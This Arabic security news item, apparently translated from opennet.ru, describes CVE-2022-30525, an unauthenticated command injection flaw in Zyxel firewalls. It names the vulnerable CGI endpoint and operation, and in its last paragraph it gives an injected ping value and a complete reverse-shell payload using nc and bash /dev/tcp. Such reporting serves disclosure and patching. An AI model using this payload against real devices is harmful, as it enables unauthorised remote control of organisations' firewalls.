ثغرة أمنية في جدران الحماية Zyxel التي تسمح بتنفيذ التعليمات البرمجية دون مصادقة

تم التعرف على ثغرة خطيرة (CVE-2022-30525) في أجهزة Zyxel من سلسلة ATP وVPN وUSG FLEX، المصممة لتنظيم تشغيل جدران الحماية وIDS وVPN في المؤسسات، والتي تسمح لمهاجم خارجي بتنفيذ تعليمات برمجية على الشبكة. الجهاز دون حقوق المستخدم دون مصادقة. لتنفيذ هجوم، يجب أن يكون المهاجم قادرًا على إرسال طلبات إلى الجهاز باستخدام بروتوكول HTTP/HTTPS. قام Zyxel بإصلاح الثغرة الأمنية في تحديث البرنامج الثابت ZLD 5.30. وفقًا لخدمة Shodan، يوجد حاليًا 16213 جهازًا يحتمل أن تكون معرضة للخطر على الشبكة العالمية والتي تقبل الطلبات عبر HTTP/HTTPS.

يتم تنفيذ العملية عن طريق إرسال أوامر مصممة خصيصًا إلى معالج الويب /ztp/cgi-bin/handler، والذي يمكن الوصول إليه دون مصادقة. سبب المشكلة هو عدم وجود تنظيف مناسب لمعلمات الطلب عند تنفيذ الأوامر على النظام باستخدام استدعاء os.system المستخدم في مكتبة lib_wan_settings.py والذي يتم تنفيذه عند معالجة عملية setWanPortSt.

على سبيل المثال، يمكن للمهاجم تمرير السلسلة "؛ بينغ 192.168.1.210;" مما سيؤدي إلى تنفيذ الأمر "ping 192.168.1.210" على النظام. للوصول إلى واجهة الأوامر، يمكنك تشغيل "nc -lvnp 1270" على نظامك، ثم بدء اتصال عكسي عن طريق إرسال طلب إلى الجهاز باستخدام '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

المصدر: opennet.ru

إضافة تعليق